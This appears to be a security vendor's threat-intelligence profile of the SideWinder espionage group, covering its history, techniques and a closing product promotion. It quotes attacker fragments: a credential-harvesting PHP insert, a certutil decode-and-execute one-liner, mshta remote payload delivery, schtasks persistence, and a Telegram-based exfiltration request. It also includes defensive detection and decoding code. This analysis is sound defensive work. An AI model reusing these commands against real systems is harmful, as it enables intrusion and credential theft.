SideWinder is a long-running cyber-espionage group active since at least 2012, consistently refining its targeting and operational scale. Over the years, the group has expanded from focused regional intrusions to wide-ranging campaigns across Asia, Africa, and parts of Europe. Major events include its public naming in 2018, COVID-19–themed operations in 2020, expansive multi-country campaigns between 2021 and 2024, and the continued broadening of its geographic and sectoral focus, particularly toward government, military, financial, maritime, logistics, and nuclear-related entities.
SideWinder’s TTPs center on highly tailored spearphishing for initial access, using malicious files, links, and credential-harvesting pages. Execution typically relies on Windows scripting environments such as cmd.exe, VBA, VBScript, and mshta-based HTA delivery. Persistence is maintained through scheduled tasks and autostart scripts, while privilege escalation leverages UAC bypass techniques. The group employs extensive defense evasion techniques, which include obfuscation, masquerading, artifact cleanup, and DLL side-loading, alongside robust credential-theft capabilities targeting RDP, Windows credential stores, and browser data. Its collection methods include harvesting documents, system information, and browser tokens, while C2 operations rely on rotating server lists, encrypted channels, and occasional web-service-based exfiltration.
In this post, we will review SideWinder’s major historical operations, highlight its expansive targeting across government, military, financial, and critical-infrastructure sectors, and examine the group’s tactics, techniques, and procedures to understand how it conducts methodical, multi-stage cyber-espionage campaigns. In the end, we will show how Picus helps defend against this group.
2012 (at least) – The threat group begins activity, specializing in cyberespionage [1].
12 April 2018 – Kaspersky publicly names the SideWinder APT group for the first time in an APT Trends summary [2].
2020 – The group capitalizes on global events by launching campaigns utilizing a COVID-19 theme to lure victims, notably targeting Pakistani Government Officials [3].
June – November 2021 – SideWinder conducts a systematic and expansive campaign targeting over 60 entities across South and East Asia, including governments, military organizations, central banks, and media in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka [1].
2024 – The group broadens its geographic operations across numerous regions, including Africa, Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, the Philippines, Sri Lanka, the UAE, Vietnam, and global diplomatic entities, while shifting its sector focus toward maritime infrastructure, logistics companies, and nuclear power facilities in South Asia [4].
The attack chain is dependent on the victim running a malicious file. In some attack chains, a ZIP archive is delivered containing a malicious LNK (shortcut) file. Upon execution, this LNK file runs code to fetch the next-stage HTA payload from an attacker-controlled server [2].
The group's principal infiltration vector is spearphishing emails carrying malicious attachments. While RTF (Rich Text Format) files are common, other formats like DOCX, LNK, and ZIP files are also employed.
One observed example targeted Pakistani government offices with a malicious .docx file, using a lure related to police procedures [2].
From: SSP INT LCTD SINDH
Beyond attachments, the threat actor also utilizes spearphishing links to direct victims to malicious destinations. These links often lead to credential harvesting sites, which are sophisticated phishing pages impersonating legitimate login portals for services like the Zimbra web client, the Central Bank of Myanmar, and the Nucleus Vision crypto platform.
A backend login.php script is used to capture credentials. This script is configured to harvest the victim's username, password, IP address, access time, and User-Agent, inserting them into a MySQL database [1]. A significant attributional clue is the script's hardcoded timezone setting of Asia/kolkata, which is set before recording the access time.
<?php
$accesstime = date('d-m-Y H:i:s');
$sql = "INSERT INTO vision.nucleus (username, password, ipaddress, accesstime, signature) VALUES ('$username', '$password', '$ip', '$accesstime', '$useragent')";
?>
The Windows Command Shell (cmd.exe) is a fundamental component for orchestrating the infection. Malicious macros and HTA files frequently drop and execute batch scripts (often named a.bat). These scripts manage various actions, including creating persistence via scheduled tasks, running payloads, and cleaning up forensic evidence [1].
schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch /TR
A more complex, multi-stage "dropper" script has also been observed. Its sole function is to use echo commands to write a series of other batch files (b.bat, c.bat, d.bat, e.bat) and VBScripts to the disk. This chain is responsible for downloading, decoding (using certutil), creating persistence (using schtasks), and finally deleting all operational artifacts [1].
echo off
VBA macros (like the "Gohra" macro) embedded in Office documents are used to decode and drop payloads. The payload (e.g., a ZIP file) is stored as a long, delimited string within a form element (UserForm1.TextBox1.Text). The macro reconstructs the malicious file by splitting this string by its delimiter (e.g., "-") and converting each part into a byte [1].
Dim btsGohra7(361128) As Byte
VBScript files, often executed by the batch scripts, serve as stealthy launchers and persistence mechanisms.
This script launches two other scripts, invisible2.vbs and a.bat, in hidden windows (argument 0) [1].
CreateObject("Wscript.Shell").Run "%APPDATA%\invisible2.vbs", 0,
This script's function is to extract the contents of the WindowsSecurity.zip archive using the Shell Application COM object [1].
Set oApp =
This script is used for persistence. It is placed in the Startup folder, sleeps for 5 minutes (300000 milliseconds), and then launches the main batch script (a.bat) in a hidden window [1].
WScript.Sleep 300000
A generic runner script that executes its first command-line argument (WScript.Arguments(0)) in a hidden window [1].
CreateObject("Wscript.Shell").Run Chr(34) &
The malware employs direct Windows API calls to execute shellcode. For instance, one stager allocates a new memory buffer using VirtualAlloc, copies its shellcode into this buffer, and then passes execution to it by calling CreateThread [1].
The group is known to exploit CVE-2017-11882, a memory corruption vulnerability in the Microsoft Office Equation Editor. This flaw is used to gain code execution from malicious RTF files [2].
A core execution technique involves using mshta.exe, a legitimate and signed Microsoft utility. This binary is used to download and run remote HTA (HTML Application) files or JavaScript [1]. This action is typically initiated when a user clicks a malicious LNK file or via shellcode from an RTF exploit.
Link Target: C:\Windows\System32\mshta.exe
The primary persistence mechanism on Windows is the use of Scheduled Tasks. Batch scripts run during infection leverage schtasks.exe to create new tasks. These tasks are configured to re-execute the main payload at frequent intervals, such as every 2 or 10 minutes, or daily at a set time [1].
# Runs every 2 minutes, named WindowSecurityPatch
In some infection chains, the inevitable.vbs script is dropped into the user's Startup folder [1]. This ensures the script is automatically run every time the user logs in.
The malware attempts to bypass User Account Control (UAC) using techniques selected based on the security products installed on the system. The default method abuses the CMSTP (Windows Connection Manager Profile Installer) program. This technique involves passing a custom profile to the legitimate CMSTP executable to run arbitrary commands with elevated privileges.
This default bypass is used unless Kaspersky or 360 Total Security products are detected. If those security solutions are present, the malware switches to a different UAC bypass that abuses the "IElevatedFactoryServer" COM object. In this scenario, shellcode is injected into explorer.exe. This shellcode loads a malicious library (from a resource named "COMUacBypass"), which uses the COM object to register a new, high-privilege Windows task. This task is then used to run the payload with elevated permissions [5].
To hinder static analysis, some payloads (like SideWinder.ReverseShell.e, and the Chisel tool) are packed using UPX [1].
Persistence-related scheduled tasks are given common, system-related names to appear legitimate, such as WindowSecurityPatch, CloudAPIManager, WindowsUpdate, and WindowHost.
Payloads are given names like WindowsSecurity.exe to mimic benign Windows components.
Malicious LNK files are disguised using double file extensions, such as .pdf.lnk or .doc.lnk, to trick users into believing they are simple documents.
The multi-stage batch scripts are designed for self-cleanup. For example, the final e.bat script in one chain is tasked with deleting all previous batch scripts (b.bat, c.bat, d.bat) and the downloaded encoded payload (cloudstatus.txt) after the final executable is active and persisted.
The group employs several methods to decode payloads on the victim's machine. The legitimate Windows utility certutil.exe is used to Base64-decode payloads downloaded to disk (e.g., hello.txt, cloudstatus.txt) [1].
cmd.exe /c certutil -decode %tmp%/hello.txt %tmp%/scvhost.exe & %tmp%/scvhost.exe
Various custom XOR decryption schemes are also used [1], [5].
Malicious files and directories are hidden. One HTA downloader creates the %userprofile%\windowshost directory with both "hidden" and "system" attributes. The batch scripts also use the attrib +h command to hide payloads and themselves from user view [1].
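As an added detection example (not code from the post or from the reports it cites), the following Python classifies process command lines against the behaviours described above: schtasks persistence with a short minute interval or one of the look-alike task names listed earlier, certutil -decode, mshta fetching a remote URL, and attrib +h. The sample command lines are constructed, the 10-minute threshold and the example.invalid host are assumptions for illustration.

```python
import re

# Look-alike task names the post reports (assumption: compare case-insensitively).
SUSPECT_TASK_NAMES = {"windowsecuritypatch", "cloudapimanager", "windowsupdate", "windowhost"}

# Command-line rules for the living-off-the-land behaviours described in the post.
RULES = [
    ("certutil_decode", re.compile(r"\bcertutil(\.exe)?\b.*\s-decode\b", re.I)),
    ("mshta_remote", re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.I)),
    ("attrib_hide", re.compile(r"\battrib(\.exe)?\b.*\+h\b", re.I)),
]
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*?/create\b", re.I)
TASK_NAME = re.compile(r'/tn\s+"?([^\s"]+)', re.I)
MINUTE_INTERVAL = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
SHORT_INTERVAL_MINUTES = 10  # the post reports 2- and 10-minute re-execution (threshold assumed)

def classify(cmdline: str) -> set:
    """Return the set of behaviour tags matched by one process command line."""
    hits = {tag for tag, rx in RULES if rx.search(cmdline)}
    if SCHTASKS_CREATE.search(cmdline):
        hits.add("schtasks_create")
        name = TASK_NAME.search(cmdline)
        interval = MINUTE_INTERVAL.search(cmdline)
        if name and name.group(1).lower() in SUSPECT_TASK_NAMES:
            hits.add("schtasks_lookalike_name")
        if interval and int(interval.group(1)) <= SHORT_INTERVAL_MINUTES:
            hits.add("schtasks_short_interval")
    return hits

def scan(cmdlines):
    """Return (cmdline, tags) for every line that matched at least one rule."""
    results = [(c, classify(c)) for c in cmdlines]
    return [(c, tags) for c, tags in results if tags]

# Constructed sample process command lines (not real telemetry); the host is a placeholder.
SAMPLE_CMDLINES = [
    'schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch /TR "%APPDATA%\\a.bat"',
    "cmd.exe /c certutil -decode %tmp%/hello.txt %tmp%/scvhost.exe & %tmp%/scvhost.exe",
    "C:\\Windows\\System32\\mshta.exe http://example.invalid/stage.hta",
    "attrib +h +s %userprofile%\\windowshost",
    "schtasks /create /SC daily /ST 09:00 /TN BackupJob /TR backup.exe",
    "notepad.exe readme.txt",
]

if __name__ == "__main__":
    for cmdline, tags in scan(SAMPLE_CMDLINES):
        print(sorted(tags), cmdline)
```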
DLL side-loading is a key technique for both execution and evasion. An HTA script first copies a legitimate, signed executable (e.g., rekeywiz.exe) to a new directory. It then drops a malicious loader DLL into the same directory but renames it to match a legitimate DLL that the executable tries to load (e.g., Duser.dll).
A configuration file (rekeywiz.exe.config) is also dropped to prevent .NET versioning issues. When the legitimate rekeywiz.exe is run, the Windows loader finds and loads the malicious Duser.dll first. This loader DLL then reads, decrypts, and loads the final implant (e.g., MpyutHk.tmp) from disk into memory.
The rekeywiz.exe.config file forces the legitimate executable to use .NET runtimes compatible with the malicious DLL.
<?xml version="1.0" encoding="utf-8"?>
This code shows the loader reading the encrypted implant, using the first 32 bytes as a rolling XOR key, and loading the decrypted assembly [2].
static Program()
Program.BufferCopy_1(ref assemblyData, 32, ref array, array.Length);
for (int i = 0; i < array.Length; i++) {
The "StealerBot" implant includes an advanced RDP credential stealer. It monitors for the mstsc.exe (RDP client) process. When launched, shellcode is injected into the process. This shellcode loads a malicious C++ library that uses the Microsoft Detours package to hook three functions within SspiCli.dll.
Stolen credentials are sent back to the main implant via a named pipe: c63hh148d7c9437caa0f5850256ad32c [5].
Another StealerBot module targets Windows credentials. It injects shellcode into explorer.exe, loading credsphisher.dll. This DLL calls the CredUIPromptForWindowsCredentialsW API, which displays a legitimate-looking native Windows prompt. It validates the entered credentials using LogonUserW. If valid, they are exfiltrated via a named pipe (a21hg56ue2c2365cba1g9840256ad31c). If invalid, the prompt is shown again in a loop until correct credentials are provided [5].
A .NET "StealerBot Token Grabber" module is designed to steal cookies and authentication tokens from high-value services like Facebook, LinkedIn, and Google (Gmail, Google Drive). It achieves this by dropping its own legitimate dependencies (e.g., Newtonsoft.Json.dll, System.Data.SQLite.dll) to parse the browser's cookie database and exfiltrate the tokens [5].
A C# tool, originally named ChromeRecovery.exe, is used to extract authentication data from a wide variety of web browsers, including "Chrome", "Opera", "Yandex", "Brave Browser", "Vivaldi", and "Edge Chromium". The collected data (URL, username, password, and application) is saved to %TEMP%\windowslogs.txt [1].
A Python-based stealer (SideWinder.StealerPy) gathers the victim's local and external IP addresses. The external IP is identified by making a request to the public service http://ip.42.pl/raw [1].
One stealer variant searches the user's Desktop, Downloads, and Documents folders for files with specific extensions: .txt, .docx, .pdf, .xlsx, .pptx, .snt, .jpg, and .png. It also obtains a full list of all files and directories on the Desktop.
Malware is programmed to collect files from the local system. The SideWinder.StealerPy not only collects documents but also reads the first 200 characters of .txt files, likely for quick data triage [1].
The "StealerBot" implant gathers extensive system information using WMI queries and formats it into a JSON file for exfiltration. Collected data includes user accounts, computer system details (model, manufacturer, RAM), installed antivirus products, running processes, and detailed network interface information [2].
jsonWriter.WritePropertyName("sysInfo");
SysInfo.WriteWmi(jsonWriter, "Win32_process", @"root\cimv2", new string[] { "Name", "CommandLine", "ProcessOwner" });
// ... code loops through NetworkInterface.GetAllNetworkInterfaces()
// to collect MAC, IP, Type, Speed, IsDhcpEnabled, etc.
One of the RATs contains a hardcoded list of C2 server addresses. It randomly selects a server from this list upon execution. If the connection fails, it iterates to the next server, providing resilience against C2 takedowns [1].
C2 Server List
One RAT variant uses the Telegram Bot API for exfiltration, sending a GET request with Base64-encoded data [1].
GET REQUEST TO https://api[.]telegram[.]org/bot[token]/sendMessage?chat_id=[id]&text=[base64_data]
The Chisel tool, a Go-based utility for network traffic tunneling, has been utilized. The PE32 executable, packed with UPX, was observed connecting to a hardcoded server (microsoft-winupdate[.]servehttp[.]com:8443) and listening on local port 45689 for inbound connections [1].
C2 communications are not sent in clear text. One RAT uses a custom, multi-layer obfuscation scheme designed to evade network signatures. The data is first Base64 encoded, then XOR-encrypted with the 3-byte key "NPA", and finally Base64 encoded two more times [1].
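As an added example (not code from the post or from the reports it cites), here is a Python decoder for the layering just described, with the matching encoder alongside so that analysts can generate test vectors for their own detections. The sample beacon is constructed.

```python
import base64

C2_XOR_KEY = b"NPA"  # the 3-byte key reported in [1]

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encode_c2(plaintext: bytes) -> bytes:
    """Apply the layers in the order the post describes: base64, XOR("NPA"), base64, base64."""
    layer1 = base64.b64encode(plaintext)
    layer2 = xor_bytes(layer1, C2_XOR_KEY)
    layer3 = base64.b64encode(layer2)
    return base64.b64encode(layer3)

def decode_c2(blob: bytes) -> bytes:
    """Peel the layers in reverse order; raises ValueError (binascii.Error) if a layer is malformed."""
    layer3 = base64.b64decode(blob, validate=True)
    layer2 = base64.b64decode(layer3, validate=True)
    layer1 = xor_bytes(layer2, C2_XOR_KEY)
    return base64.b64decode(layer1, validate=True)

def try_decode_c2(blob: bytes):
    """Return the decoded bytes, or None when the blob does not fit this scheme.
    Useful when sweeping captured request bodies for traffic that matches it."""
    try:
        return decode_c2(blob)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

# Constructed sample beacon (not a real SideWinder message).
SAMPLE_PLAINTEXT = b'{"host":"WIN-LAB01","user":"analyst"}'
SAMPLE_BLOB = encode_c2(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print(SAMPLE_BLOB.decode())
    print(decode_c2(SAMPLE_BLOB))
```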
We also strongly suggest simulating SideWinder Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for SideWinder:
| Threat ID | Threat Name | Attack Module |
| --- | --- | --- |
| 90234 | Sidewinder Threat Group Campaign Malware Downloader Email Threat | Network Infiltration |
| 50150 | Sidewinder Threat Group Campaign Malware Downloader Download Threat | Network Infiltration |
| 29210 | Sidewinder Threat Group Campaign Malware Download Threat | Network Infiltration |
| 20419 | Sidewinder Threat Group Campaign Malware Email Threat | Network Infiltration |
| 73639 | Sidewinder Threat Group Campaign Malware Email Threat | Network Infiltration |
| 45965 | Sidewinder Threat Group Campaign Malware Download Threat | Network Infiltration |
| 75691 | SideWinder Threat Group Campaign | Windows Endpoint |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
SideWinder is also known as: T-APT-04, Rattlesnake, Razor Tiger, APT-C-17, Hardcore Nationalist, HN2, APT-Q-39, BabyElephant, GroupA21.
References
[1] “OLD SNAKE, NEW SKIN.” Accessed: Nov. 16, 2025. [Online]. Available: https://go.group-ib.com/report-sidewinder-2023
[2] “A global perspective of the SideWinder APT.” Accessed: Nov. 16, 2025. [Online]. Available: https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
[3] “Sidewinder APT Group Campaign Analysis,” Rewterz - Revolutionizing Cybersecurity. Accessed: Nov. 16, 2025. [Online]. Available: https://rewterz.com/threats/sidewinder-apt-group-campaign-analysis
[4] G. Dedola, “SideWinder targets the maritime and nuclear sectors with an updated toolset,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/
[5] G. Dedola, “Beyond the Surface: the evolution and expansion of the SideWinder APT group,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt/114089/